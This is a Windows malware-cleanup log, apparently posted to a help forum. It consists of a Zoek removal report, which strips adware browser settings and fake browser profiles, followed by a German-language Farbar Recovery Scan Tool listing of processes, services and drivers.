user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setndsvalue_2.0.0.440", false);
---- Lines searches removed from prefs.js ----
user_pref("browser.urlbar.suggest.searches", true);
---- FireFox user.js and prefs.js backups ----
prefs__1343_.backup
ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F
user.js not found
---- FireFox user.js and prefs.js backups ----
prefs__1343_.backup
ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default
user.js not found
---- Lines webget removed from prefs.js ----
user_pref("extensions.webget.asul", "1400531425838");
user_pref("extensions.webget.aul", "1400530028243");
user_pref("extensions.webget.irl", true);
user_pref("extensions.webget.is", "isgi1whDE");
user_pref("extensions.webget.ug", "19739959-F219-4984-864D-0CB6FC4D1F41");
---- Lines {21EAF666-26B3-4a3c-ABD0-CA2F5A326744} removed from prefs.js ----
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.extensionFirstRun", false);
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.lastExtensionVersion", "2.0.0.440");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_install_time", "19-05-2014");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_product_name", "V-bates");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_product_version", "2.0.0.440");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_temp_version", "2.0.0.440|||8641400531305203");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_toolbarID", "dc73c26d8e6b4a77a3e092975238ebb7");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setdefaultsearch_2.0.0.440", false);
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setdnscatch_2.0.0.440", false);
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.sethomepage_2.0.0.440", false);
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setndsvalue_2.0.0.440", false);
---- Lines browser.startup.page removed from prefs.js ----
user_pref("browser.startup.page", 1);
---- FireFox user.js and prefs.js backups ----
prefs__1343_.backup
==== Deleting Files \ Folders ======================
C:\PROGRA~3\{FE8D473A-6F06-4F99-B5F4-BED72B2A038C} not found
C:\PROGRA~2\Adblock for Gmail deleted
C:\PROGRA~2\Color Icons for Gmail deleted
C:\Users\Denny\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108 deleted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Search.lnk deleted
C:\Users\Public\Documents\dmp deleted
C:\WINDOWS\SysNative\config\systemprofile\Searches deleted
C:\WINDOWS\SysWow64\searchplugins deleted
C:\WINDOWS\SysWow64\Extensions deleted
C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\jetpack deleted
C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\jetpack deleted
C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\jetpack deleted
C:\Users\Denny\Desktop\Continue Last version Installation.lnk deleted
"C:\windows\Installer\1504d.msi" deleted
"C:\WINDOWS\Installer\1b6bc9bd.msi" deleted
==== Firefox Start and Search pages ======================
ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
==== Firefox Extensions ======================
ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F
- Undetermined - C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\extensions.ini
AppDir: C:\Program Files (x86)\Mozilla Firefox
- Undetermined - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi
==== Firefox Plugins ======================
==== Fake Chromium Profiles Check ======================
Fake profile C:\Users\Administrator\AppData\Local\Google\Chrome deleted
Fake profile C:\Users\Administrator\AppData\Local\Google\Chrome SxS deleted
Fake profile C:\Users\Administrator\AppData\Local\Comodo\Dragon deleted
Fake profile C:\Users\Denny\AppData\Local\Google\Chrome deleted
Fake profile C:\Users\Gast\AppData\Local\Torch deleted
Fake profile C:\Users\Gast\AppData\Local\Google\Chrome deleted
Fake profile C:\Users\Gast\AppData\Local\Google\Chrome SxS deleted
Fake profile C:\Users\Gast\AppData\Local\Comodo\Dragon deleted
Fake profile C:\Users\HomeGroupUser$\AppData\Local\Torch deleted
Fake profile C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome deleted
Fake profile C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome SxS deleted
Fake profile C:\Users\HomeGroupUser$\AppData\Local\Comodo\Dragon deleted
==== Chromium Look ======================
Chrome Hotword Shared Module - Denny\AppData\Local\Chromium\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg
==== Set IE to Default ======================
Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="hxxp://www.google.de/"
"Search Page"="hxxp://www.google.com"
"Default_Page_URL"="hxxp://www.google.com"
"Search Bar"="hxxp://www.google.com"
"Use Search Asst"="yes"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="hxxp://www.google.com"
"Default_Page_URL"="hxxp://www.google.com"
"Search Page"="hxxp://www.google.com"
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="hxxp://www.google.com"
"Default_Page_URL"="hxxp://www.google.com"
"Search Page"="hxxp://www.google.com"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchUrl]
"Default"="hxxp://www.google.com"
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl]
"Default"="hxxp://www.google.com"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl]
"Default"="hxxp://www.google.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"Default_Search_URL"="hxxp://www.google.com"
New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Search Page"="hxxp://go.microsoft.com/fwlink/?LinkId=54896"
"Search Bar"="hxxp://go.microsoft.com/fwlink/?LinkId=54896"
"Default_Page_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=69157"
"Start Page"="hxxp://www.google.de/"
"Use Search Asst"="no"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=54896"
"Search Page"="hxxp://go.microsoft.com/fwlink/?LinkId=54896"
"Default_Page_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=69157"
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=54896"
"Search Page"="hxxp://go.microsoft.com/fwlink/?LinkId=54896"
"Default_Page_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=69157"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchUrl]
"(Default)"="hxxp://search.msn.com/results.asp?q=%s"
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl]
"(Default)"="hxxp://search.msn.com/results.asp?q=%s"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl]
"(Default)"="hxxp://search.msn.com/results.asp?q=%s"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"Default_Search_URL"="hxxp://go.microsoft.com/fwlink/?LinkId=54896"
==== All HKLM and HKCU SearchScopes ======================
HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
HKLM\SearchScopes\{362BB042-C718-4C1E-A525-564285A105FD} - hxxp://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS
HKLM\SearchScopes\{80c554b9-c7f8-4a21-9471-06d606da78a2} - hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
HKLM\SearchScopes\{DC91FAFB-6CEA-49E5-BB74-9CEE75D09B77} - hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\Wow6432Node\SearchScopes\{80c554b9-c7f8-4a21-9471-06d606da78a2} - hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
HKCU\SearchScopes "DefaultScope"="{8CB5941F-AEB6-4B8B-956E-95EBED73E3FE}"
HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - hxxp://www.google.com/search?q={searchTerms}
HKCU\SearchScopes\{8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} - https://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
==== Deleting Registry Keys ======================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\203E62EEA6789D84098513925E9B9999 deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F274703B9DB704042955ECD6A611693A deleted successfully
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{EE26E302-876A-48D9-9058-3129E5B99999} deleted successfully
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B307472F-7BD9-4040-9255-CE6D6A1196A3} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\203E62EEA6789D84098513925E9B9999 deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\F274703B9DB704042955ECD6A611693A deleted successfully
==== Empty IE Cache ======================
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\M8QJFTEX will be deleted at reboot
C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\P0OXFN6R will be deleted at reboot
C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\TS9KI79H will be deleted at reboot
==== Empty FireFox Cache ======================
C:\Users\Denny\AppData\Local\Mozilla\Firefox\Profiles\41A66E7E5EE1\cache2 emptied successfully
==== Empty Chrome Cache ======================
C:\Users\Denny\AppData\Local\Chromium\User Data\Default\Cache emptied successfully
==== Empty All Flash Cache ======================
Flash Cache Emptied Successfully
==== Empty All Java Cache ======================
Java Cache cleared successfully
==== C:\zoek_backup content ======================
C:\zoek_backup (files=85 folders=25 21801290 bytes)
==== Empty Temp Folders ======================
C:\Users\Administrator.Schneider\AppData\Local\Temp emptied successfully
C:\Users\Default\AppData\Local\Temp emptied successfully
C:\Users\Default User\AppData\Local\Temp emptied successfully
C:\Users\Denny\AppData\Local\Temp will be emptied at reboot
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully
C:\WINDOWS\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\WINDOWS\Temp will be emptied at reboot
==== After Reboot ======================
==== Empty Temp Folders ======================
C:\WINDOWS\Temp successfully emptied
C:\Users\Denny\AppData\Local\Temp successfully emptied
==== Empty Recycle Bin ======================
C:\$RECYCLE.BIN successfully emptied
==== Deleting Files / Folders ======================
"C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\M8QJFTEX" not found
"C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\P0OXFN6R" not found
"C:\Users\Denny\AppData\Local\Microsoft\Windows\INetCache\IE\TS9KI79H" not found
==== EOF on 30.03.2016 at 13:54:38,34 ======================
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01 durchgeführt von Denny (Administrator) auf SCHNEIDER (30-03-2016 14:42:55) Gestartet von C:\Users\Denny\Desktop Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator) Platform: Windows 8.1 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser nicht gefunden!) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe (SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe (SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe (Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe (Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe (Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe (Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbam.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe (Intel Corporation) C:\Windows\System32\igfxTray.exe (Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe (Microsoft Corporation) C:\Windows\System32\SkyDrive.exe (Atheros Communications) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Adobe Systems Incorporated) C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Registry (Nicht auf der Ausnahmeliste) =========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13449288 2013-03-26] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor) HKLM\...\Run: [Samsung Link] => C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe [600928 2014-03-13] (Copyright 2013 SAMSUNG) HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation) HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [619008 2010-05-25] (Nikon Corporation) HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-03] (Adobe Systems Incorporated) HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-21] (Avira Operations GmbH & Co. KG) HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132224 2013-02-28] (Atheros Communications) HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [718208 2010-03-16] (Microsoft Corporation) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130926929970896047&GUID=91D7EFA7-E23E-4872-8361-CEB8ED36209E HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM-x32 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> DefaultScope {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?} SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?} BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation) StartMenuInternet: IEXPLORE.EXE - iexplore.exe FireFox: ======== FF ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1 FF NewTab: about:newtab FF Homepage: about:home FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-03] (Adobe Systems) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-02-18] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-02-18] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-10-23] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-10-23] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-03] (Adobe Systems) FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-16] [ist nicht signiert] Chrome: ======= CHR dev: Chrome dev build erkannt! <======= ACHTUNG StartMenuInternet: Google Chrome - chrome.exe ==================== Dienste (Nicht auf der Ausnahmeliste) ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 AdobeActiveFileMonitor13.0; C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe [231120 2014-08-31] (Adobe Systems Incorporated) S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG) S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227968 2013-02-28] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert] R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe [2797312 2013-12-04] (Acer Incorporated) S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [660040 2013-01-18] (Acer Incorporated) R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [676336 2015-09-03] (SEIKO EPSON CORPORATION) R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation) R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2013-02-18] (Intel Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2013-02-18] (Intel Corporation) R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [431656 2013-03-15] (Acer Incorporate) R2 MBAMScheduler; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1136608 2016-03-10] (Malwarebytes) R2 Samsung Link Service; C:\Program Files\Samsung\Samsung Link\Samsung Link.exe [609632 2014-03-13] (Copyright 2013 SAMSUNG) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation) ===================== Treiber (Nicht auf der Ausnahmeliste) ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-03-21] (Avira Operations GmbH & Co. KG) R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-21] (Avira Operations GmbH & Co. KG) S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-28] (Qualcomm Atheros) S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation) R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-01-10] (Acer Incorporated) R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-30] (Malwarebytes) R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) R0 PxHlpa64; C:\Windows\System32\drivers\PxHlpa64.sys [56336 2013-09-03] (Corel Corporation) S3 QRDCIO; C:\Windows\System32\drivers\QRDCIO.sys [9728 2009-10-20] (QUANTA) R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [15704 2013-01-10] (Acer Incorporated) R3 RTSPER; 